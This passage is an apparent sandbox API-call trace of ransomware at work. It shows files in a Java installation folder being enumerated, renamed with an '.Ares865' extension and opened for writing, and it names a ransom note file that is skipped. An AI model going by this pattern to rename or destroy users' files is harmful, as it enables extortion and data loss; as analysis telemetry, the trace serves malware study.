dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.759] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17832) returned 1 [0138.765] lstrcpyW (in: lpString1=0x2cce44a, lpString2="orbd.exe" | out: lpString1="orbd.exe") returned="orbd.exe" [0138.765] lstrlenW (lpString="orbd.exe") returned 8 [0138.765] lstrlenW (lpString="Ares865") returned 7 [0138.765] lstrcmpiW (lpString1="rbd.exe", lpString2="Ares865") returned 1 [0138.765] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe.Ares865") returned 53 [0138.765] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe.ares865"), dwFlags=0x1) returned 1 [0138.772] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.772] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.777] lstrcpyW (in: lpString1=0x2cce44a, lpString2="pack200.exe" | out: lpString1="pack200.exe") returned="pack200.exe" [0138.777] lstrlenW (lpString="pack200.exe") returned 11 [0138.777] lstrlenW (lpString="Ares865") returned 7 [0138.777] lstrcmpiW (lpString1="200.exe", lpString2="Ares865") returned -1 [0138.777] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe.Ares865") returned 56 [0138.777] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe.ares865"), dwFlags=0x1) returned 1 [0138.779] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\pack200.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\pack200.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.784] lstrcpyW (in: lpString1=0x2cce44a, lpString2="plugin2" | out: lpString1="plugin2") returned="plugin2" [0138.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0138.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f2030 [0138.784] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0138.784] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744249a0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744249a0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744249a0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x3da8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0138.784] lstrcmpiW (lpString1="policytool.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0138.784] lstrcmpiW (lpString1="policytool.exe", lpString2="aoldtz.exe") returned 1 [0138.784] lstrcpyW (in: lpString1=0x2cce44a, lpString2="policytool.exe" | out: lpString1="policytool.exe") returned="policytool.exe" [0138.784] lstrlenW (lpString="policytool.exe") returned 14 [0138.784] lstrlenW (lpString="Ares865") returned 7 [0138.785] lstrcmpiW (lpString1="ool.exe", lpString2="Ares865") returned 1 [0138.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe.Ares865") returned 59 [0138.785] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe.ares865"), dwFlags=0x1) returned 1 [0138.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.792] lstrcpyW (in: lpString1=0x2cce44a, lpString2="prism-d3d.dll" | out: lpString1="prism-d3d.dll") returned="prism-d3d.dll" [0138.792] lstrlenW (lpString="prism-d3d.dll") returned 13 [0138.792] lstrlenW (lpString="Ares865") returned 7 [0138.792] lstrcmpiW (lpString1="d3d.dll", lpString2="Ares865") returned 1 [0138.792] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll.Ares865") returned 58 [0138.792] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\prism-d3d.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\prism-d3d.dll.ares865"), dwFlags=0x1) returned 1 [0138.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\prism-d3d.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.794] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45992) returned 1 [0138.799] lstrcpyW (in: lpString1=0x2cce44a, lpString2="rmid.exe" | out: lpString1="rmid.exe") returned="rmid.exe" [0138.799] lstrlenW (lpString="rmid.exe") returned 8 [0138.799] lstrlenW (lpString="Ares865") returned 7 [0138.799] lstrcmpiW (lpString1="mid.exe", lpString2="Ares865") returned 1 [0138.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe.Ares865") returned 53 [0138.799] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe.ares865"), dwFlags=0x1) returned 1 [0138.801] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmid.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmid.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.801] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.804] lstrcpyW (in: lpString1=0x2cce44a, lpString2="rmiregistry.exe" | out: lpString1="rmiregistry.exe") returned="rmiregistry.exe" [0138.804] lstrlenW (lpString="rmiregistry.exe") returned 15 [0138.804] lstrlenW (lpString="Ares865") returned 7 [0138.805] lstrcmpiW (lpString1="try.exe", lpString2="Ares865") returned 1 [0138.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe.Ares865") returned 60 [0138.805] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe.ares865"), dwFlags=0x1) returned 1 [0138.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.806] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.810] lstrcpyW (in: lpString1=0x2cce44a, lpString2="servertool.exe" | out: lpString1="servertool.exe") returned="servertool.exe" [0138.810] lstrlenW (lpString="servertool.exe") returned 14 [0138.810] lstrlenW (lpString="Ares865") returned 7 [0138.810] lstrcmpiW (lpString1="ool.exe", lpString2="Ares865") returned 1 [0138.810] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe.Ares865") returned 59 [0138.810] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe.ares865"), dwFlags=0x1) returned 1 [0138.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\servertool.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\servertool.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15784) returned 1 [0138.816] lstrcpyW (in: lpString1=0x2cce44a, lpString2="splashscreen.dll" | out: lpString1="splashscreen.dll") returned="splashscreen.dll" [0138.816] lstrlenW (lpString="splashscreen.dll") returned 16 [0138.816] lstrlenW (lpString="Ares865") returned 7 [0138.816] lstrcmpiW (lpString1="een.dll", lpString2="Ares865") returned 1 [0138.816] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll.Ares865") returned 61 [0138.816] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\splashscreen.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\splashscreen.dll.ares865"), dwFlags=0x1) returned 1 [0138.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\splashscreen.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\splashscreen.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.818] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=196520) returned 1 [0138.831] lstrcpyW (in: lpString1=0x2cce44a, lpString2="ssv.dll" | out: lpString1="ssv.dll") returned="ssv.dll" [0138.831] lstrlenW (lpString="ssv.dll") returned 7 [0138.831] lstrlenW (lpString="Ares865") returned 7 [0138.831] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll.Ares865") returned 52 [0138.831] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll.ares865"), dwFlags=0x1) returned 1 [0138.833] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssv.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssv.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.833] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=462760) returned 1 [0138.859] lstrcpyW (in: lpString1=0x2cce44a, lpString2="ssvagent.exe" | out: lpString1="ssvagent.exe") returned="ssvagent.exe" [0138.859] lstrlenW (lpString="ssvagent.exe") returned 12 [0138.859] lstrlenW (lpString="Ares865") returned 7 [0138.859] lstrcmpiW (lpString1="ent.exe", lpString2="Ares865") returned 1 [0138.859] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe.Ares865") returned 57 [0138.859] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe.ares865"), dwFlags=0x1) returned 1 [0138.861] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\ssvagent.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\ssvagent.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.861] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49064) returned 1 [0138.875] lstrcpyW (in: lpString1=0x2cce44a, lpString2="sunec.dll" | out: lpString1="sunec.dll") returned="sunec.dll" [0138.875] lstrlenW (lpString="sunec.dll") returned 9 [0138.875] lstrlenW (lpString="Ares865") returned 7 [0138.875] lstrcmpiW (lpString1="nec.dll", lpString2="Ares865") returned 1 [0138.875] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll.Ares865") returned 54 [0138.875] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunec.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunec.dll.ares865"), dwFlags=0x1) returned 1 [0138.878] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunec.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunec.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.878] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=123816) returned 1 [0138.888] lstrcpyW (in: lpString1=0x2cce44a, lpString2="sunmscapi.dll" | out: lpString1="sunmscapi.dll") returned="sunmscapi.dll" [0138.888] lstrlenW (lpString="sunmscapi.dll") returned 13 [0138.888] lstrlenW (lpString="Ares865") returned 7 [0138.888] lstrcmpiW (lpString1="api.dll", lpString2="Ares865") returned -1 [0138.888] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll.Ares865") returned 58 [0138.888] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunmscapi.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunmscapi.dll.ares865"), dwFlags=0x1) returned 1 [0138.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunmscapi.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25512) returned 1 [0138.894] lstrcpyW (in: lpString1=0x2cce44a, lpString2="t2k.dll" | out: lpString1="t2k.dll") returned="t2k.dll" [0138.894] lstrlenW (lpString="t2k.dll") returned 7 [0138.894] lstrlenW (lpString="Ares865") returned 7 [0138.894] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll.Ares865") returned 52 [0138.895] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\t2k.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\t2k.dll.ares865"), dwFlags=0x1) returned 1 [0138.896] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\t2k.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\t2k.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.896] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=192936) returned 1 [0138.908] lstrcpyW (in: lpString1=0x2cce44a, lpString2="tnameserv.exe" | out: lpString1="tnameserv.exe") returned="tnameserv.exe" [0138.908] lstrlenW (lpString="tnameserv.exe") returned 13 [0138.908] lstrlenW (lpString="Ares865") returned 7 [0138.908] lstrcmpiW (lpString1="erv.exe", lpString2="Ares865") returned 1 [0138.909] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe.Ares865") returned 58 [0138.909] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe.ares865"), dwFlags=0x1) returned 1 [0138.911] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.911] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16296) returned 1 [0138.915] lstrcpyW (in: lpString1=0x2cce44a, lpString2="unpack.dll" | out: lpString1="unpack.dll") returned="unpack.dll" [0138.915] lstrlenW (lpString="unpack.dll") returned 10 [0138.915] lstrlenW (lpString="Ares865") returned 7 [0138.915] lstrcmpiW (lpString1="ack.dll", lpString2="Ares865") returned -1 [0138.915] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll.Ares865") returned 55 [0138.915] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack.dll.ares865"), dwFlags=0x1) returned 1 [0138.917] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=58280) returned 1 [0138.925] lstrcpyW (in: lpString1=0x2cce44a, lpString2="unpack200.exe" | out: lpString1="unpack200.exe") returned="unpack200.exe" [0138.925] lstrlenW (lpString="unpack200.exe") returned 13 [0138.925] lstrlenW (lpString="Ares865") returned 7 [0138.925] lstrcmpiW (lpString1="200.exe", lpString2="Ares865") returned -1 [0138.926] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe.Ares865") returned 58 [0138.926] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe.ares865"), dwFlags=0x1) returned 1 [0138.927] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.927] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=146344) returned 1 [0138.938] lstrcpyW (in: lpString1=0x2cce44a, lpString2="verify.dll" | out: lpString1="verify.dll") returned="verify.dll" [0138.938] lstrlenW (lpString="verify.dll") returned 10 [0138.938] lstrlenW (lpString="Ares865") returned 7 [0138.938] lstrcmpiW (lpString1="ify.dll", lpString2="Ares865") returned 1 [0138.939] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll.Ares865") returned 55 [0138.939] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\verify.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\verify.dll.ares865"), dwFlags=0x1) returned 1 [0138.940] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\verify.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\verify.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.941] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39848) returned 1 [0138.946] lstrcpyW (in: lpString1=0x2cce44a, lpString2="w2k_lsa_auth.dll" | out: lpString1="w2k_lsa_auth.dll") returned="w2k_lsa_auth.dll" [0138.946] lstrlenW (lpString="w2k_lsa_auth.dll") returned 16 [0138.946] lstrlenW (lpString="Ares865") returned 7 [0138.946] lstrcmpiW (lpString1="uth.dll", lpString2="Ares865") returned 1 [0138.946] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll.Ares865") returned 61 [0138.946] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\w2k_lsa_auth.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\w2k_lsa_auth.dll.ares865"), dwFlags=0x1) returned 1 [0138.948] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\w2k_lsa_auth.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\w2k_lsa_auth.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.948] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21416) returned 1 [0138.952] lstrcpyW (in: lpString1=0x2cce44a, lpString2="WindowsAccessBridge-32.dll" | out: lpString1="WindowsAccessBridge-32.dll") returned="WindowsAccessBridge-32.dll" [0138.952] lstrlenW (lpString="WindowsAccessBridge-32.dll") returned 26 [0138.952] lstrlenW (lpString="Ares865") returned 7 [0138.952] lstrcmpiW (lpString1="-32.dll", lpString2="Ares865") returned -1 [0138.952] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll.Ares865") returned 71 [0138.952] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\windowsaccessbridge-32.dll"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\windowsaccessbridge-32.dll.ares865"), dwFlags=0x1) returned 1 [0138.954] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\WindowsAccessBridge-32.dll.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\windowsaccessbridge-32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0138.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96168) returned 1 [0138.962] lstrcpyW (in: lpString1=0x2cce44a, lpString2="wsdetect.dll" | out: lpString1="wsdetect.dll") returned="wsdetect.dll" [0138.962] lstrlenW (lpString="wsdetect.dll") returned 12 [0138.962] lstrlenW (lpString="Ares865") returned 7 [0138.962] lstrcmpiW (lpString1="ect.dll", lpString2="Ares865") returned 1 [0138.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll.Ares865") returned 57 [0138.963] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\wsdetect.dll" (normalized: "c:\\program files 